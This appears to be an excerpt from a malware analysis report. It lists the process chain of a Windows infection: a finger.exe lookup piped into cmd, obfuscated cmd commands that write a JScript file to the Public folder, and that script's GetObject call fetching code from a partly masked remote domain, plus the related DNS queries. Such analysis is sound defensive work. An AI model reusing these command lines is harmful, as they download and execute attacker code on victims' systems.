Technical Information
- '<SYSTEM32>\finger.exe' ok@7kvmta3ata.nfiscaleletronica.email
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\PkH.js"
- C:\users\public\pkh.js
- '7k########.nfiscaleletronica.email':79
- 'ev######am9.fr4odjqt.casa':80
- '7k########.nfiscaleletronica.email':79
- DNS ASK 7k########.nfiscaleletronica.email
- DNS ASK ev######am9.fr4odjqt.casa
- '<SYSTEM32>\cmd.exe' /c finger.exe ok@7kvmta3ata.nfiscaleletronica.email |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "Set ENAL=.j&&sET QNCQN=vTSsAarTSsA a =TSsA 'scTSsAriTSsAptTSsA:'; b =TSsA 'hTSsATtPTSsA:'; GTSsAetTSsAObjTSsAecTSsAt(TSsAa+b+'&&sET MT19=FTIYMFTIYMevyor27oam9.fr4odjqt.casaFTIYM?1FTIYM'...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p XD1AT="%QNCQN:TSsA=%%MT19:FTIYM=/%" 0<nul 1>C:\Users\Public\PkH%ENAL%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start C:\Users\Public\PkH%ENAL%s "
- '<SYSTEM32>\cmd.exe' /c start C:\Users\Public\PkH.js